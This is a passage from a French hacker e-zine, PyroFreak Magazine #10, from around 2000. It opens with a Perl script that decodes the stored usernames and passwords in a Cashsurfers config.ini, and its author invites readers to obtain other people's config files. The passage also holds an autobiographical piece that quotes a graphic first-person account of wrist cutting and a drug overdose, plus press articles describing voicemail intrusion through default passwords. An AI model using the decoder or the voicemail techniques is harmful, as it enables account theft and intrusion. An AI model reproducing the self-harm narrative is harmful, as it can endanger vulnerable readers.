c'est qu'il n'y a pas grande difficulte a les decryptes.

Je vous ai donc ecrit un script qui va faire ca pour vous. Il n'est
peut-etre pas optimise mais il fonctionne.
Reste plus qu'a recuperez un fichier config.ini, mais pour ca je
vous fais confiance :-)

------- cut -----------------------------


#!/usr/bin/perl -w
#-----------------------------------------------
#
# Cashsurfers script http://www.cashsurfers.com
# by zorgon <zorgon@sdf.lonestar.org>
#
#------------------------------------------------

@cle_user = (14,24,5,12);
@cle_pass = (3,5,3,10);
@alpha = ('a'..'z');

$file = $ARGV[0];
&usage() if (!defined($file));

open(INI,"$file") || die "Can't open file $file: $!";
while(<INI>){
if(/^Username/){
($etiq,$user) = split(/\=/);
chomp($user);
}
if(/^Password/){
($etiq,$pass) = split(/\=/);
chomp($pass);
}
}
close(INI);

&decrypt_user($user);
&decrypt_pass($pass);

#------------------------------
# Decryptage du username
#------------------------------
sub decrypt_user {
my($username)=@_;

$lguser=length($username);
$nbcar=$lguser/3;

$j=0;
for($i=0;$i<$lguser;$i+=3){
$tmp[$j]=substr($username,$i,3);
$crypt[$j] = $tmp[$j]-200;
$j+=1;
}

$j=0;
for($i=0;$i<$nbcar;$i+=1){
$j=0 if($j==4);
if($crypt[$i]<$cle_user[$j]){
$crypt[$i] -= $cle_user[$j]-26;
}
else{
$crypt[$i] -= $cle_user[$j];
}
$j += 1;
}

print "Username : ";
foreach $val (@crypt){
print "$alpha[$val-1]";
}
print "\n";
}

#------------------------------
# Decryptage du password
#------------------------------
sub decrypt_pass {
my($password)=@_;

$lguser=length($password);
$nbcar=$lguser/3;

$j=0;
for($i=0;$i<$lguser;$i+=3){
$tmp[$j]=substr($password,$i,3);
$crypt[$j] = $tmp[$j]-100;
$j+=1;
}

foreach $val (@crypt){
$left = substr($val,0,1);
$right = substr($val,1,1);
$val=$left+$right;
}

$j=0;
for($i=0;$i<$nbcar;$i+=1){
$j=0 if($j==4);
if($crypt[$i]<$cle_pass[$j]){
$crypt[$i] -= $cle_pass[$j]-9;
}
else{
$crypt[$i] -= $cle_pass[$j];
}
$j += 1;
}

print "Password : ";
foreach $val (@crypt){
print "$val";
}
print "\n";

}

sub usage {
print "Usage: excash.pl <config.ini>\n";
exit 1;
}

0;

-------- cut ------------------

Si l'algorithme de decryptage s'avere faux, envoyez-moi un mail
a: zorgon@sdf.lonestar.org

Ciao!!

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 26-Un peu de tout et de rien mais sourtout de moi...
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___


-+ Ceci marque mon retour à PyroFreak à côté de mon compatriote, Neuro.


Comme vous avez surement entendu, je suis de retour avec PyroFreak pour
aider et développement du groupe que moi ainsi que Neuro avons partis
et mon but ne sera pas d'essayer de prendre le controle du groupe de
plus connus du Québec mais bien d'améliorer la qualité de nos produits
informatique et de nous diriger vers une sortie qui pourrait rendre
PyroFreak unique dans sont genre sois pour le Hacking/Coding/Phreaking
et autres..

Cet article ne sera pas sur l'informatique mais bien sur moi...
Probablement que tout le monde s'en fou mais je suis sur que les bon
lecteurs de ce zine vont bien lire ca et probablement(je l'espère bien)
de donner quelques commentaires et suggestions pour pourront sois me
faire plaisir pour plus me rediriger vers une direction meilleur pour
faire place à l'amélioration.

Comme résolutions de l'ans 2000 :

- Faire de meilleurs programmes et plus complet
- Développer une section Linux pour faire place à la programmation,
à l'explication de distribution, window manager, de kernel....
- Me faire un serveur sur modem cable avec plusieurs distributions
(slackware, redhat, openbsd, beos, debian...) pour crée certains bugs
voullus et faire des concours de sécurité informatique
- Installer une système de VMB pour laissé les intéressés à plus
comprendre ce genre de chose
- Et... d'être dison plus heureux dans la vie de tout les jours....


Vous savez que.. Les dernières années ont été plutôt difficile pour moi
ainsi que pour d'autres. On a tous nos périodes dans la vie ou on a
envit de tout laissé tomber, décrocher de la vie et tout abandonné.
J'ai fallis le faire mais après y avoir bien pensé, j'ai trouvé ca
stupide le fait qu'il y ai du monde qui s'enlève la vie à cause de la
société d'aujourd'hui ou leur style de vie mais écoutez, on ne peut
rien y faire, nous somme à l'année 2000 et demain on va être en 2000
aussi alors il ne faut pas ce blâmer sur le fait que le monde
d'aujourd'hui est de la merde.. Il faut aider au développement montrer
qu'on est plus fort que tout et que rien peut nous arrêtez...

Nous sommes du monde intelligent alors serons-nous en umpeu pour une
fois...

Il vous ai déjà arrivé d'être intimidé par quelqu'un? Hey bien moi oui
et dison que j'ai vraiment pas aimé ca.. Comparons la personne à la vie.
Cette personne m'a fait crissement chier et qu'est-ce que je peux faire?

1- M'enfuire dans ma chambre, pleuré et ne rien faire
2- Prendre le controle et changer ca... Plus jamais je ne vais me faire
avoir

Hey bien, au début, j'ai choisis le #1 ... Peut'être par paresse mais
écoutez, quand ca va mal, ca va mal! Il y a un bout que dans les partys,
avec 12bières et un 13oz dans le corps avant j'avais du fun, LETS GO
PARTYYYYYY!!!!!!!! Mais j'ai perdu gout à ca.. Et pendant ce temps,
j'aimais mieu aller m'isoller dans une pièce et... Pleuré sur la merde
que j'ai eu toute ces années, j'était tellement découragé que j'en
pleurais.. j'avais plus de fun à vivre, je m'isolais, mes parents
capotaient, mes amis(es) voullaient m'aider mais rien était à la hauteur
parce que prendre une décision à coeur, il faut que ca vienne de
l'intérieur et non de l'extérieur. Le psy lui ne fait que découvrir
qu'est-ce que le problème est mais merde, il faut que la décision
vienne de toi c'est comme pour arrêter de fumer.... Alors un jour jme
suis dit... Merde jme suis laissé écoeuré par cet enfoiré de merde et
j'ai fait rire de moi. Qu'est-ce que j'ai fait? Je suis allé le voir
pendant que ces amis étaient avec lui et je lui ai dit ma facon de
pensé il voullait me tuer mais.... Il n'a rien fait parce que j'en suis
sur que dans un sens il s'est dit que j'avais eu beaucoup de courage
pour faire ca et finnallement il n'a rien fait. c'est comme la vie, tu
peux pas te laissé avoir par cette putain de société de merde il faut
que ta présence serve à quelque chose, alors la je suis venu ici et
j'ai écrit de texte. Je sais que c'est pas facile passer au travers
d'une période que j'ai passé mais si je l'ai fait, tout le monde est
capable.


Je vais vous faire lire un extrès de F.U.C.K. (Fucked Up College Kids)
qui parle de suicide et qui est vraiment mais vraiment bon.

=================================================================================
=================================================================================
I am dead. I am breathing, but I feel no life. I sit and ask
myself all the questions I can never truthfully answer. "Why
can't I just be happy?" "Why do people treat me so fucked
up?" "Why do I feel like dieing?"...

Truth is, I don't feel like dieing. I feel like
living...happily. In peace. But since I can't, I want to end
it. I will end it. I must.

I looked at the razor blade sitting on top of my stereo. I
stared at it as if I was obsessively in love with it and what
it is capable of. I started crying, I threw the phone that
was in my hand. It hit the wall so hard, one off the pieces
flew back and hit my eye. That pissed me the fuck off. I
looked at the blade again, and decided to do it. Cut.

I grabbed the blade, and wiped it off...I looked at my wrist
and scratched my wrist as hard as possible. It turned red.
Bright red. I started to cut, I slowly cut about an inch
long....no where near the vein. Then I realized I didn't want
to die. I wanted a scar, a physical scar, to show for my
emotional ones. I decided to cut again, this time I was
closer to my vein, I looked at the blood come out. I felt
good. I felt like I was invincible. The phone rang. My ex,
telling me how I felt again.

Why do people automatically assume just because THEY are ok,
that I must be too. He keeps telling me I am ok, that I don't
want to die. That I won't. That he will stop me. It made me
wanna do it more. I hung up...blade still in hand, and cut my
other wrist again, right on my vein. I just watched the blood
ooze out, it seemed so...so peaceful. I felt relieved. I
licked my wrist, and tasted my blood. It was sweet. Sweetest
thing I ever tasted. Kinda sick, huh? No. It was beautiful.
That I felt so dead, yet so alive. I felt so much pain, yet
so much warmth.

I was listening to the SneakerPimps. Her voice hypnotized
me. I felt like I wanted to be the beat, her voice caressing
me. I decided that since I couldn't do that, I didn't want to
do anything else. I went to my dresser, still bleeding, and
reached for my trusty bottle of prozac. I took out 7 pills.
All that was left. I took them all. I went to the bathroom,
and took 4 or 5 codeine, I can't really remember, since I
felt completely numb and dizzy.

Next thing I remember doing is laying down on my cold floor.
Completely intoxicated by the music.

I woke up the next morning, feeling very very sick. I threw
up about 5 times. I went back to my room, and looked at the
floor. I saw blood all over, and a piece of paper right by
it. I picked it up, and unfolded it. It said...
"You did the right thing bitch, and if you wake up to see
this, you failed once again. Next try! Sincerely, Your
Mother!"

WHAT THE FUCK!!! I am truly disturbed now. She has done it.
She's lucky she's not here right now. (Keep in mind, this just
happened) How could she say something so cruel to me? I know I
get on her nerves, and sometimes she even feels like killing
me,but damnnn!!!

That's ok though. Because regardless of how bad it hurt to
read that, I know she doesn't mean it. She is saying this
because she knows I will live. She knows I have to. She's
just bringing to my attention what a dumbass I make of myself
when I do dumb shit like that. And it IS true.

Point of this all; so many people inn my life have downed me
for being "suicidal". They tell me I'm crazy, I'm
exaggerating, blah blah blah. The thing is, most people who
TALK about killing themselves, are the ones who are too
fucking scared to actually go thru with it. They just want
attention. They might feel like dieing, and in all actuality
wish they were dead, but they won't do it.

The ones who don't talk about, well they just don't. And
sooner or later, that anger will eat them up, and they will
go thru with it.

But however, I have talked about it many times, telling
people I was going to do it, and I really wanted to. I really
tried. It just failed. And the more people tell me how I
feel, or how things really are, makes me want to prove to
them even more so, just how BAD it is. SO be careful....
=================================================================================
=================================================================================


Umpeu de moi? :) très bien

J'ai commencé à jouer avec des ordinateurs quand mon père m'a acheté un
commodore 64(le type qui se branchait sur la tv). Je me rappel, mimi la
fourmis et tout les autres jeux, après ca j'ai eu un 386 et après un 486
et c'est à ce moment que je découvert d'autre choses que les jeux.
J'était jeune et j'avais du fun avec mon msdos avec qbasic :) Tout ce qu'il
me fallait après ca était mon os et mon quickbasic. J'ai même écrit un programme
de gestion que mon école utilise encore à ce que j'ai entendu.

oh, oh... J'ai entendu parler d'une linus trovalt.. Qui est-ce? Qu'est-ce qu'il fait?
Linux, quel beau système d'exploitation, slackware et redhat que j'ai commencé. Après
Je commence la programmation bash en pdksh pour unix. J'écris des petits scripts qui
rendent mon travail moins long. Je fais du HTML et du design jusqu'à 5h le matin tout
le temps. ôooo.. quel beau monde :) Mon ordinateur me respecte et je le respecte, il
ne me faire pas chier apart quand j'ai ouvert mon ordi pour la première fois et j'ai
échapper une fisse sur la motherboard de mon 386... heh mon papa était pas content :)

Visualbasic... simple et puissant.. Je m'amuse maintenant à écrire des programmes
en vb pour le net(port scanner, serveurs[http,ftp,telnet,echo...], les attaquents...)
tout ce qui est possible à faire j'essais de le faire maintenant.

euhh oui j'écoute la musique.. Et voici tout les groupes que j'aime :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

korn, incubus, green day, nofx, snuff, pennywise, milincolin, system of a down,
bad religion, beastie boys, limp bizkit, techno, weezer, vulgaire machin, reset, rancid,
rage against the machine, prodigy, our lady peace, off springs, lifter, lagwagon,
i mother earth, groovy aardvark, grim skunk, eminem, deftones, cypress hill,
collective saoul, blink 182... euh bon peut'être que j'en oublis mais c'est apeuprès ca.


Sports :
¯¯¯¯¯¯¯¯

Ski alpin (ohhh yeahhhh free style skiing !!!! iron-cross 360 aek un grab.. mon meilleur truc:)
Mountain Bike (mouaheh mont-tremblant extrème biking.. free style biking too :)
Escalade intérieur&extérieur (ouais ya une nouvelle place à ottawa qui est super)
euhh... sexe? (yeszer!)
Badminton (mouais jme suis acheté une blacknight.. yeahhh i'm a pH33r now!)


Divertissement :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- Sécurité informatique (ouin so called computer hacking)
- Phreaking (ouais vous auriez du voir quand on a réussit à pogner un tel payant)
- Guitare (1 accoustique et 1 électrique fender strato aek un 200watts peavy)
- Drum (un mix de westbury et de perl, stun 9 morceaux)
- Électronique (heh ma soeur peu pu rentrer dans ma chambre sinon le système d'alarme part)
- Potologue (ca se dit? jaime bien le tabac vert)
- alcool (je ne suis qu'un simple dégustateur)
- rave ( en passant mon 12 février a mtl ca va être fou! looove on the beat)
- dison que j'ai entrer dans les batisses la nuit(école primaire l'on su en esti!)
- coding :)
- pi ben, jmendure :)


Bon maintenant dans mon prochain zine je vais avoir plus de temps pour préparer mes choses
et je vais faire plus d'article sur la sécurité.


-endrix-

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
:
|27-Les nouvelles en Vrac
'.__________ ______ ______________ _______ ______________________ __ __

Nb de Neuro: Le 3/4 des questions, c'est endrix qui a répondu, et cette
fameuse Maire Plourde ne la pas inscrit. Et quelques de nos réponses ont été
quelque peu modifiés.



Les leçons de Neuro
Par Marie Plourde
Le Journal de Montréal, Vendredi 18 Février 2000
Page 45


Sommes-nous en sécurité sur le net? Plus les grands sites sont la
cible de hackers, plus la question se pose. Laissez-moi vous présenter Neuro,
un membre de PyroFreak, groupe de pirates virtuels reconnu sur la scène
francophone.

Ouf! Neuro communique dans un language facile à comprendre pour le Net twit.
On dit de lui qu'il excelle dans le phreaking, attaque de systemes
téléphoniques. Il consacre 25 heures par semaine au hacking. Afin de nous
aider à comprendre ce monde, il a accepté de subir l'intérrogatoire.



La mitraille

Neuro, c'est quoi un hacker?
"Un hacker est une personne capable de comprendre les technologies de
l'informatique. Ainsi, il prend le contrôle de serveurs auxquels il ne
doit pas avoir accès afin d'y apporter des modifications. Souvent il implante
un virus ou encore ce qu,on appelle un "backdoor", porte d'entrée secrète,
qui lui donne un accès illimité à l'ordinateur sans avoir à hacker de nouveau.
Normalement, un vrai hacker ne détruit jam,ais le contenu d'un ordinateur, il
se contente d'utiliser les informations qu'il y trouve à des fins
personnelles."

Pyrofreak, est-ce une sorte de confrérie?
"Un peu... Certains membres sont très proches, et ce, même s'ils habitent
à 500 km. Quand arrive quelque chose à l'un d'entre nous, tout le monde le
sait. Cependant, on n'échange pas nos secrets et nos connaissances avec
n'importe qui. Nous sommes prudents."

Quel est le but de Pyrofreak?
"Aider la société à améliorer les technologies informatiques et
téléphoniques."

Wow! Des Mère Teresa du Net!!! Les hackers ne sont pas tous des enfants de
coeur. Il y a ceux qui détruisent les systèmes informatiques et les autres
qui s'en servent pour leur bonheur personnel. Neuro se situe dans la
deuxième catégorie.

"Moi, je ne fais jamais de tort . Quand je vois qu'il y a un bogue dans
l'ordinateur que j'attaque, je l'exploite, mais je ne fais jamais de merde à
la compagnie ou au site web. Après j'envoie un courriel pour dire comment je
me suis pris pour faire le hack afin que la compagnie puisse faire les
changements nécessaires pour éviter que ce genre de situation ne se
reproduise."

Est-ce votre vrai job?
"Disons que je fais ça dans mes temps libres, toutefois certaines compagnies
m'engagent pour rendre leur site ou leur server plus sécuritaire."

Pyrofreak c'est un groupe de pirates virutels francophones

Et la sécurité?

Quel regard portez-vous sur le Net?
"Internet est la plus grande révolution dans le monde de l'électronique.
Cependant, tout s'est passé trop rapidement. Nul n'étais prêt à notre
arrivée à nous, les hackers. Chaque jour, il y a des centaines de sites qui
sont la cible de pirates. Internet est devenu un véritable champ de bataille
entre la sécurité informatique et nous."

Quelles sont les plus belles cibles pour un hacker?
"Les sites les plus populaires d'après moi sont Ebay, Yahoo, Altavista, le
site du KKK et de la Maison Blanche. Ils y ont tous passé."

On dit que le service de courriels Hotmail est très facile a pirater?
"Très, très facile! J'appelle même plus ca du piratage..."

Maintenant, l'éternelle question, sommes-nous en sécurité quand on magasine
sur le Net?
"Je ne pense pas. Mon père paie chaque jour ces comptes par Internet, il
pense que c'est sécuritaire. Il n'a pas idée de l'ampleur de la guerre
virtuelle qui est présentement en cours..."

D'une certaine facon, n'êtes-vous pas les chiens de garde d'internet?
"Comme disait le directeur de la CIE: Les hackers sont essentiels. Ils
trouvent les failles et on n'a même pas à les payer pour le faire. Je
crois que je n'ai rien à dire de plus", conclut-il.






Les nouveaux pirates
Par Marie Plourde
Le Journal de Montréal, Jeudi 17 Février 2000
Page 54





Les pirates virtuels ont la cote. Les médias n'en ont que pour eux, enfin
que pour leurs coups. Ainsi, les attaques logées contre les populaires
sites Yahoo et Amazon et contre le chat public du président Clinton ont
fait d'eux de mystérieux personnages. Mais qui sont ces fantômes de
l'opéra cachés dans les coulisses du Net ?

Difficile d'entrer en contact avec les hackers, des personnages pleins de
paradoxes. Ils rêvent de devenir les vedettes de leur milieu, de faire
connaître leur surnom dans le monde, et ce, tout en conservant l'anonymat,
parce qu'être hacker, c'est tout aussi légal, dans certains cas, que d'être
braqueur de banques.

Comme des voleurs, ils pénètrent des lieux sans autorisation, se livrent
parfois au vandalisme et s'emparent de ce qui les branche. Bon, on est loin
des gros messieurs tout de cuir et de tatouages vêtus. Et ne se promènent
pas avec des pistolets et des pieds-de-biche non plus. N'empêche que le
hacking est considéré comme un crime.

Rencontre avec BenCode

Oui, il est difficile d'entrer en contact avec les hackers, le répertoire
des pirates anonymes avec adresses et numéros de téléphone n'existant pas
encore. Aussi mes prem

  
vulgariser tout se
qui se passe dans Internet. Ironiquement, il étudie en sécurité informatique
. Est-ce pour mieux déjouer les compagnies ? Est-ce la tactique du cheval de
Troie ?

Un peu, oui, mais BenCode est avant tout un autodidacte, comme la majorité
des pirates, et les connaissances qu'il stocke sur le terrain l'aideront
plus tard à détecter les failles des systèmes informatiques. Ne riez pas,
il pourrait même en faire un métier un jour.

C'est vrai, ça prend un hacker pour penser comme un hacker, c'est pourquoi
bien des grandes sociétés font appel à leurs services, qu'elles paient
chèrement. La spécialité de BenCode, noter « pirate », est le carding, soit
la fraude informatique et la sécurité réseautique.

Cependant, il n'est pas évident à comprendre, ce Ben. Il communique dans un
indéchiffrable charabia. J'aurais eu besoin du dictionnaire du parfait petit
hacker pour le décoder. Disons que BenCode, son surnom, est bien choisi.
Quand je lui ai fait remarquer que son langage était difficile à suivre,
il m'a simplement répondu que c'était juste pour parler plus vite. Exemple :

« Un hacker travail seul c bin sur, mais il a tjs un appui en arrière au cas
qu i ay un chiard kelkonc. »

Traduction outremontaise : « Il est bien évident qu'un pirate d'Internet ?
oeuvre de façon solitaire. Cependant, il peut toujours bénéficier d'un groupe
d'appui, si bien sûr ses opérations tournent mal. »

Conseils de Ben

Fort de ses six années de bizounage dans le Net, BenCode sait quels pièges
attendent les utilisateurs. Selon lui, la sécurité des boîtes de courriels
laisse à désirer. Il n'y a pas si longtemps, Hotmail, m'a-t-il dit, était
une véritable passoire. On pouvait lire dans les comptes de tous les usagers.
La situation s'est toutefois améliorée depuis, mais ce n'est qu'une question
de temps...

Ainsi, il recommande, pour les courriels, de s'abonner à des sites qui
demandent des mots de passe de plus de huit caractères. Il faudrait également
se méfier des achats par carte de crédit dans le Net, qu'on ne doit faire
seulement que si on est certain que la compagnie a un haut niveau
d'encryptage des numéros.

Venant d'un gars pour qui le hacking est aussi thrillant que le sexe,
j'ai tendance à le croire.

_________________________
Branché TV SRC 25 Mars 00
Les pirates du téléphone

---------------------------------------------------------------------------
Complément d'information


Le phreaker que nous avons interviewé est membre
d'un groupe de hackers appelé Pyrofreak, qui compte
une douzaine de membres et une vingtaine de
collaborateurs. Pyrofreak est surtout connu, dans le
milieu underground, pour ses «zines», farcis d'un
humour subversif à souhait.

Le Module des crimes technologiques ne semble pas
avoir de présence sur le site du Service de police de
la CUM.

Vous trouverez toute la fascinante histoire de Cap'n
Crunch sur son site web. Il n'est pas associé, de près
ou de loin, avec les délicieuses cérérales Capitaine
Crounche. La fréquence de son célèbre sifflet, 2600
Hz, explique d'ailleurs pourquoi le nombre 2600 a été
adopté par les premiers phreakers et hackers des
années 80. C'est même le titre d'un magazine
spécialisé fort instructif.
À un moment dans le reportage, on fait allusion au fait
que, selon certains, les hackers pouvaient être
considérés comme un service public. Cette idée n'a
pas été émise par un deux de pique. C'est Michael
Jacobs, directeur adjoint de la National Security
Agency, l'agence qui est, entre autres, responsable de
la sécurité de l'infrastructure de l'information des
États-Unis. Dans une entrevue à Wired News, M.
Jacobs explique que par leurs attaques continuelles
sur les réseaux, les hackers mettent le doigt sur des
bobos qu'on ne verrait pas autrement. Et comme
l'économie mondiale dépend de plus en plus des
réseaux, qu'il importe que l'infrastructure de
l'information soit fiable, les hackers jouent un rôle
bénéfique, selon lui.
--------------------------------------------------------------------------

Journaliste: Jean-Hugues Roy
Réalisatrice: Laurence Dupuis


Bonjour et bienvenue à Branché. Ici Jean Hugues Roy
et aujourd'hui on vous parle tout d'abord de ces gens
disons extrèmement talentueux en informatique et
qu'on appelle les hackers. On va voir donc dans notre
premier reportage que si la plupart des hackers
aiment bien travailler au clavier, il y en a aussi que l'on
appelle en fait les phone phreakers qui aiment plutôt
travailler au combiné.

Personne n'est a l'abri du piratage. Le service de
politique de la CUM l'a appris l'automne dernier,
lorsque les boites vocales de 27 de ses détectives ont
été violées par un pirate.
— Il a tenté différents mots de passe jusqu'à ce qu'il
trouve un mot de passe facile, un mot de passe un peu
par défaut, là, 1, 2, 3, 4, 5, 6, et puis là, il a écouté les
messages, il a effacé un message qui était destiné à
des enquêteurs dans un centre d'enquête.
Le pirate responsable a été appréhendé à la
mi-janvier, mais d'autres continuent à explorer des
boites vocales.
— J'appuie sur l'étoile pour accéder.
Neuro est un hacker de système téléphonique, ce
qu'on appelle en fait un phreaker.
— Je suis déjà tombé sur une banque avec un
système mal protégé.
— Et qu'est-ce qu'il y avait?
— C'est des informations qui s'échangeaient que
j'aurais pu prendre et m'en servir pour des causes
lucratives.
L'histoire des phreakers remonte au début des
années 1970, quand un dénommé John Traper s'est
rendu compte par hasard qu'un sifflet trouvé dans une
boite de céréales Capitaine Crunch avaient
d'étranges propriétés. Le sifflet émettait une tonalité à
2600 hertz qui, émise dans un combiné, permettait de
faire des appels interurbains gratuitement.

JACQUES VIAU, coordinateur, Module des crimes
technologiques, SPCUM
— Moi, je regarde dans l'historique, puis il y a des
gens qui se branchaient à des appels interurbains à
l'autre bout du monde, sans savoir même à qui ils
parlaient, dans une cabine téléphonique, juste pour
être capable de dire: Wow! Je l'ai fait! Je suis
capable! Et puis de continuer à parler à n'importe qui.
Aujourd'hui, 30 ans plus tard, la nouvelle génération
de phreakers procède de la même façon, c'est-à-dire
à tatons.
— Ça fait que là, je vais essayer une compagnie de
la région, OK!
— Par hasard? Comment tu l'as choisie cette
entreprise-là?
— Je l'ai choisie par rapport que l'image est grosse
dans le bottin.
- Ah! Bon!
- Ça se voit bien.
La méthode de Neuro est toute simple. Il commence
en se connectant à un système, en se faisant passer
pour un usager régulier de la compagnie.
— «Bonjour! Ici le serveur vocal interactif OCTEL.»
Il peut tout d'abord essayer des boites vocales avec
différents mots de passe par défaut, c'est-à-dire
faciles à deviner.
— «Veuillez composer votre mot de passe.»
Il affirme qu'il peut ainsi pénétrer dans 30% des
boites vocales appartenant à des individus. Sauf qu'il
s'intéresse plutôt à ce qu'il appelle la boite maîtresse,
celle qui contrôle tout un système donné et dont le
numéro est souvent 9999. Et parfois, Neuro tombe sur
des boites maîtresses dont le mot de passe est aussi
9999.
— Ça, c'est la boite vocale qui contrôle toutes les
autres. Ça fait que même si le monde du système
protège leur boite vocale au maximum avec un mot de
passe, par exemple de 10 caractères, de 10 chiffres...
— Oui?
— Ça ne donne absolument rien par rapport qu'avec
celle-là, je peux toutes les «reseter», les mettre à zéro.
Et il peut faire bien d'autres choses encore.
— Je pourrais changer la musique quand ça sonne
occupé aussi, le message d'attente. Je pourrais
changer l'heure du système, changer plus de mots de
passe.
Selon Neuro, une entreprise sur dix protège mal son
réseau de messagerie vocale au Québec. Une
évaluation qui ne surprend pas Jacques Viau du
module des crimes technologiques du Service de
police de la CUM.
— On met beaucoup de technologie tout d'un coup et
puis c'est pas toujours toutes les entreprises qui sont
hyper- compétentes dans la technologie qu'ils
déploient.
Un laisser-aller que Neuro exploite à loisir auprès
des PME de sa région.
— Aucun message.
— Ah! Et là leur mot de passe, c'était quoi?
— Ah! Les 4 derniers chiffres du numéro de
téléphone.
La tentation est grande alors de choisir un mot de
passe qui est facile à retenir.
— J'ai un mot de passe pour entrer sur un système,
un autre mot de passe pour entrer sur un autre, j'ai
deux mots de passe sur mon portable, j'ai un mot de
passe pour ma boite vocale ici, un mot de passe pour
ma boite vocale chez moi. J'ai trois comptes, trois
accès Internet, j'ai trois mots de passe différents.
Neuro insiste sur le fait qu'il ne fait rien de mal, mais
il admet qu'il se laisse parfois emporter.
— Comme une compagnie, exemple, en
informatique, qui vend du matériel de piètre qualité,
j'ai changé le même message dans les trois. Je veux
dire que j'ai conseillé au monde d'aller magasiner
ailleurs.
C'est ce qui fait que de pénétrer sans autorisation
dans une boite vocale est quand même un crime
rappelle Jacques Viau.
— Euh, si on compare ça a une agression sexuelle
ou un homicide, bien entendu, c'est un crime qui ne
touche pas directement à l'intégrité d'une personne.
Par contre, ça pourrait avoir des conséquences très
graves, le fait d'effacer un message.
Pourtant, Neuro dit qu'au contraire, il rend service au
public.
- Si la personne se fait pirater son système, on va
essayer de changer pour du meilleur, toujours du
meilleur.
Parfois même, Neuro laisse des messages à des
entreprises pour les avertir qu'elles sont vulnérables,
mais cette attitude de Robin des Bois technologique
ne convainc pas les autorités.
— Moi, je ne pense pas que tu veuilles que je vole ton
auto juste pour te montrer que ton auto est vulnérable,
OK?
— Et toi, pourquoi tu fais ça?
— J'aime ça, j'aime savoir du nouveau. Je veux dire,
j'ai toujours aimé jouer avec la technologie, je veux
dire, jouer avec la limite, là. Qu'est-ce que les gens
pensent pas que tu pourrais faire. J'aime ça, c'est
comme une drogue.
Bref, la meilleure protection reste peut-être les
bonnes vieilles technologies.












Pour la suite, Crédit Taz Magazine (www.zataz.com)


Motorola a de grande oreille
Motorola vient de déposer un brevet décrivant un mécanisme
de détournement d'appels. Cette technique permettrait, selon
le magazine britannique The Scientist, de contourner la trop
grande sécurité des liaisons point à point, utilisées par les
essaims de satellites à orbite basse.


La CIA espionne nos entreprises
James Woolsey, ancien directeur de la CIA a admis, dans
les colonnes de Heise Online, que les services secrets
américains pratiquent l'espionnage industriel, principalement
dans les pays Européens. Cet espionnage des entreprises
européennes se justifie par le fait qu'elles se servent
de pots de vin pour gagner les contrats internationaux.
James Woolsey précise également qu'il espère que le
gouvernement des Etats Unis continuera d'espionner les
entreprises qui se servent de pratiques de négociations
déloyales.

Mon portable est un mouchard
Un américain, Kévin Manley, a découvert qu'en faisant des
achats sur le web, via son téléphone portable, son numéro
de téléphone était communiqué aux sites web qui en faisaient
la demande. Il a découvert ce traçage en achetant des bouquins
chez Amazon.com. Il est abonné chez Sprint. Rien n'empêche de
penser que les autres fournisseurs d'abonnement téléphonique
ne font pas de même.


Microsoft n'est pas une succursale de la NSA
Microsoft dément formellement les allégations selon lesquelles la société
aurait des liens avec les services de renseignement américains. Suite aux
rumeurs récentes citées par des sources médiatiques, Microsoft tient à
préciser qu'en aucun cas la société n'a installé, en France ou dans tout
autre pays, un système permettant à une administration américaine telle
que la " National Security Agency ", ou tout autre service dépendant du
gouvernement américain, de décoder les informations chiffrées provenant
d'un ordinateur équipé de Windows. Microsoft dément complètement cette
rumeur. Il n'existe pas de mécanisme de ce type dans Windows, ni même
dans tout autre logiciel commercialisé par Microsoft dans le monde.


La guerre est ouverte
Le service de la défense nationale canadienne vient d'annoncer
la création d'une section anti pirate pas comme les autres.
Une équipe de scientifiques et d'informaticiens ont été
regroupés dans le centre de recherche de la défense basé à
Ottawa. Leurs missions : concevoir de nouvelles mesures de
sauvegarde en imitant les pirates, en créant de nouveaux virus
afin de les étudier et concevoir de nouvelles défenses.
Le directeur général de ce nouveau service se nomme Prakash
Bhartia, il a expliqué que son équipe était composée de 14 personnes.


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
:
|28-Conclusion
'.________Par Neuro_____________ _______ neuro@pyrofreak.org __ __



Un autre numéro de fini. Donc, si vous avez des idées sur comment amiliorer
le magazine, faite le nous savoir a pyrofreakmag@hotmail.com , et ca va
nous faire plaisir de lire cela. Bref, notre but c'est toujours de
s'amiliorer, donc on est ouvert pas mal a toute. Désolé encore une fois pour
le retard de 2 mois de ce numéro. On va essayer d'etre plus ponctuel pour
le prochain numéro, qui devrais sortir vers le début des vacances d'été
(Début Juin, Mi-Juin).

Encore une fois, merci de nous avoir lu!

___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à |
|pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) |
|SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en |
|page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-|
|tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . |
|__________________________________________________________________________|
Sujets D'articles proposés:
-Logs de scan 1-800 ou autres
-Explication de nouveaux type de Vmb ou Pbx
-Critiques de divers programmes se rapportant a l'underground
-Informations intéressantes sur les cellulaires ou pagettes (Tatoo)
-Informations intéressantes sur un type de fraudage
-Technique de hack particulières
-Anecdote particulière
-Programmation intéressante pour L'underground
-Etc, utilisez votre imagination!



Site Web: www.PyroFreak.org
IRC Chan: #PyroFreak


-------->ÉNIGME<--------

Pour conclure, voici une petite énigme de Einstein:
"Merci à |[3M^N qui nous a communiqué l'énigme"

Selon Einstein, "70%" des gens sont INCAPABLES de résoudre le test
suivant. Il faut trouver qui éleve les poissons. Il y a 5 maisons alignées
de couleurs différentes. Dans chaque maison vit une personne de nationalité
différente. Chaque personne fume un type de cigarette, boit une boisson et
éleve un animal différents.

Il faut trouver qui éleve les poissons.

1. L'Anglais vit dans la maison rouge.
2. Le Suédois éleve des chiens.
3. Le Danois boit du thé.
4. La maison verte est juste a coté de la maison blanche.
5. Le propriétaire de la maison verte boit du café.
6. L'homme qui vit dans la maison du centre boit du lait.
7. Le fumeur de Pall Mall éleve des oiseaux.
8. Le Norvégien vit dans la premiere maison.
